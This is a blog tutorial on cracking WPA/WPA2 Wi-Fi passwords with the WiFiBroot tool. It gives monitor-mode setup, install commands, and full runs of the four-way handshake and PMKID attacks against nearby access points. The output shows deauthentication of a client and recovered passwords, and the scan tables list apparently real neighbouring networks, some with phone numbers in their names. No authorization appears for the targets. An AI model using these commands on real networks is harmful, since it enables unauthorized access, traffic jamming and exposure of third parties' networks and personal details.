Crack any WIFI password With WifiBroot

Eli Cyber Security
7 min readAug 13, 2019

--

There are many tools used to crack Wifi access points. Most of the Wifi authentication uses WPA/ WPA2 encryption to secure the Wifi networks. Still cracking password with WPA2 is mostly usable. According to ethical hacking researcher of international institute of cyber security still mostly users prefer to use WPA2 authentication for the Access Point security. We will show you to crack WPA/ WPA2 encryption with four way handshake & PMKID attack.

4-Way Handshake :-

Four-way handshake is created so wireless client & access point can independently know PSK. Instead of telling the keys to each other they can transfer message in encryption from to each other. Four-way handshake is critical for protecting the PSK from infected access points. The four-way handshake is used to generate Pairwise Transient Key PTK keys.

PMKID :-

PMKID is an unique identification used by Access Point to track down PMK which is being used for client. using this method attacker will directly communicate with the vulnerable access point, rather than capturing communication between Access point and clients.

Earlier also ethical hacking researcher of International institute of cyber security has demonstrated hack any wireless network.

Configure Your Wireless Interface :-

  • For configuring Wireless interface. Connect your Wireless interface with Linux. Open terminal type iwconfig to check if the wireless interface is connected. Type airmon-ng check wlan0
  • Type airmon-ng start wlano
  • Type iwconfig to check if the wireless interface has started in monitor mode.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# iwconfig eth0 no wireless extensions. lo no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.462 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off

Downloading & Installation of Wifibroot :-

  • We will show how to crack four way handshake. For testing we will use Kali Linux 2019.1 amd64.
  • Make sure python3 is installed. For that type sudo apt-get update && sudo apt-get install python3 Then type sudo apt-get install python3-pip
  • Open terminal type git clone https://github.com/hash3liZer/WiFiBroot.git
root@kali:/home/iicybersecurity/Downloads#git clone https://github.com/hash3liZer/WiFiBroot.git Cloning into 'WiFiBroot'... remote: Enumerating objects: 3, done. remote: Counting objects: 100% (3/3), done. remote: Compressing objects: 100% (3/3), done. remote: Total 276 (delta 0), reused 1 (delta 0), pack-reused 273 Receiving objects: 100% (276/276), 504.20 KiB | 347.00 KiB/s, done. Resolving deltas: 100% (166/166), done. root@kali:/home/iicybersecurity/Downloads#cd WiFiBroot/ root@kali:/home/iicybersecurity/Downloads/WiFiBroot#ls dicts handshakes pull.py screen.py wifibroot.py exceptions.py LICENSE README.md utils wirelessroot@kali:/home/iicybersecurity/Downloads/WiFiBroot#python wifibroot.py Traceback (most recent call last): File "wifibroot.py", line 19, in from wireless import Shifter File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/init.py", line 3, in from wireless.cracker import PSK File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/cracker.py", line 6, in from pbkdf2 import PBKDF2 ImportError: No module named pbkdf2
  • If the above error encounters, type pip install pbkdf2
  • Then type python wifibroot.py
root@kali:/home/iicybersecurity/Downloads/WiFiBroot#python wifibroot.py -h_ ___ ___ ___ ___ ___ \\ _ /\*\___*\__\\__\/ \ / \\___ \ \\ \\\ \\__\\ /\ ) \\ ) \\ \ \__\\__\\\ \\__\\ \\__ / \___/ \__\ v1.0. Coded by @hash3liZer.Syntax: $ python wifibroot.py [--mode [modes]] [--options] $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt Modes: # Description Value 01 Capture 4-way handshake and crack MIC code 1 02 Captures and Crack PMKID (PMKID Attack) 2 03 Perform Manaul cracking on available capture types. See --list-types 3 04 Deauthentication. Disconnect two stations and jam the traffic. 4 Use -h, --help after -m, --mode to get help on modes.

Capture & Crack Four-Way Handshake :-

  • Type python wifibroot.py -mode 1 -type handshake -i wlan0mon -verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
  • -mode 1 is used to crack four way handshake
  • -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL — WN722N V1
  • -verbose is used to print hash values.
  • -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or for cracking Wifi Passwords.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot#python wifibroot.py --mode 1 --type handshake -i wlan0mon --verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt_ ___ ___ ___ ___ ___ \\ _ /\*\___*\__\\__\/ \ / \\___ \ \\ \\\ \\__\\ /\ ) \\ ) \\ \ \__\\__\\\ \\__\\ \\__ / \___/ \__\ v1.0. Coded by @hash3liZer.[*] Path: {/home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt} Lines {42} [~] Channel Specified: NONE Hopper Status [Running] [^] Scanning! Press [CTRL+C] to stop. NO ESSID PWR ENC CIPHER AUTH CH BSSID VENDOR CL ---- ------------ ----- ----- -------- ------ ---- ----------------- -------- ---- 1 HATHWAY -38 WPA2 CCMP PSK 10 8C:E1:17:8D:5C:E4 zte 2 2 ZTE-ae1e0e -40 WPA2 CCMP PSK 1 88:5D:FB:AE:1E:0E zte 0 3 MTNL_HOTSPOT -78 WPA2 TKIP PSK 11 0C:D2:B5:2C:55:5D Binatone 1 4 Neon`Sunny -87 WPA2 TKIP PSK 1 34:E3:80:41:F8:68 Genexis 0 5 TP-LINK_D9D6 -87 WPA2 CCMP PSK 1 98:DE:D0:A7:D9:D6 TP-LINK 0
  • Press Ctrl + C for stopping the scan. Here our target is MTNL_HOTSPOT
  • Enter 3 for cracking MTNL_HOTSPOT
[] Changing Channel to 11 [SuccessFul][?] AP Clients [1] Scan Further?[Y/n] n[] Time Interval [15] -> Implies Gap b/w Frames is 15[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] [^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] [^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication][+] Handshake 0CD2B52C555D (Binatone) [Captured] [!] Handshake not saved. Use -w, --write for saving handshakes. [^] Current Password:29054367 [+] Found:29054367 [>] PMK: 00000000: 74 0a ac 04 01 16 0c dd 73 fb 4e fa 50 17 18 7f |t.......s.N.P...| 00000010: a1 c0 92 36 45 20 94 15 79 42 17 bb e2 21 5d 42 |...6E...yB...!]B| [>] PTK: 00000000: 95 5f ee 82 ca c3 a2 b5 b1 a1 75 4a 11 a2 d8 05 |._........uJ....| 00000010: 49 08 62 ec 2b b9 e6 12 13 bd f8 53 7a 0d ce a0 |I.b.+......Sz...| 00000020: 5c 4f d1 ca 04 32 4c bb f4 6a 27 21 83 26 b3 ad |\O...2L..j'!.&..| 00000030: 84 42 fb e4 49 b7 e4 e2 65 03 58 d2 30 f2 35 cb |.B..I...e.X.0.5.| [>] MIC: 00000000: da 86 9b 74 b7 d5 aa 67 2a 7d 78 aa 30 0e df e4 |...t...g*}x.0...| 00000010: 29 9a d2 de |)...|

Capture & Crack PMKID :-

  • Type python wifibroot.py -mode 2 -i wlan0mon -verbose -d dicts/list.txt -w output.txt
  • -mode 2 is used capture & crack PMKID.
  • -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL — WN722N V1
  • -verbose is used to print hash values.
  • -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or crunch for cracking Wifi Passwords.
  • -w output.txt will save PMKID.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot#python wifibroot.py --mode 2 -i wlan0mon --verbose -d dicts/list.txt -w output.txt_ ___ ___ ___ ___ ___ \\ _ /\*\___*\__\\__\/ \ / \\___ \ \\ \\\ \\__\\ /\ ) \\ ) \\ \ \__\\__\\\ \\__\\ \\__ / \___/ \__\ v1.0. Coded by @hash3liZer. [*] Path: {dicts/list.txt} Lines {42} [~] Channel Specified: NONE Hopper Status [Running] [^] Scanning! Press [CTRL+C] to stop.NO ESSID PWR ENC CIPHER AUTH CH BSSID VENDOR CL ---- -------------------------------- ----- -------- -------- ------ ---- ----------------- -------- ---- 1 Pankaj@9212458712 -23 WPA2 CCMP PSK 6 18:A6:F7:9B:27:DC TP-LINK 0 2 Cbi -29 WPA2 CCMP PSK 2 00:E0:4C:3B:37:08 REALTEK 0 3 naidus -45 WPA CCMP PSK 2 C8:3A:35:0B:26:08 Tenda 0 4 Lucky -47 WPA2 TKIP PSK 1 54:B8:0A:07:82:D2 D-Link 0 5 new_T03_T1 -50 WPA2 TKIP PSK 11 90:8D:78:F2:95:E3 D-Link 3 6 DIRECT-28-HP DeskJet 2600 series -59 WPA2 CCMP PSK 6 B4:B6:86:65:DC:29 Hewlett 0 7 Worldview@37 -76 WPA2 CCMP PSK 1 04:95:E6:A2:58:20 Tenda 0 8 Sushil@WVC9312408388 -84 WPA CCMP PSK 11 0C:D2:B5:3D:0D:3C Binatone 0 9 Excitel -85 WPA2 CCMP PSK 6 00:1E:A6:DB:B3:C0 Best 0 10 Bunty -86 WPA2 CCMP PSK 7 04:95:E6:87:AB:48 Tenda 0 11 Excitel@43 -86 WPA2/WPA CCMP PSK 7 C8:3A:35:46:BA:F8 Tenda 0 12 Worldview@tanpreet -88 WPA2 TKIP PSK 13 A0:AB:1B:D9:09:08 D-Link 0[^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Open Authentication] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull] [^] 4 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request] [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull] [] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Waiting...] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Initiated] [^] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [1 of 4][~] Vulnerable to PMKID Attack![^] PMKID 908D78F295E3 (D-Link) [a31f70cc4ed5cabb67ae4d56f11ec0b6] [+] PMKID -> [output.txt] [Saved] [^] Currently Checking:accessme [+] Password Found:accessme [>] PMKID: 00000000: 61 33 31 66 37 30 63 63 34 65 64 35 63 61 62 62 |a31f70cc4ed5cabb| 00000010: 36 37 61 65 34 64 35 36 66 31 31 65 63 30 62 36 |67ae4d56f11ec0b6| [>] PMK: 00000000: 93 89 96 03 d0 e8 ab bd e8 8b f1 1b fb 8f 05 18 |................| 00000010: 58 1e e3 cb 6d 2b ff 0d b4 96 b4 fa 74 57 bd 77 |X...m+......tW.w|

Originally published at https://www.securitynewspaper.com on August 13, 2019.

--

--

Eli Cyber Security
Eli Cyber Security

Responses (1)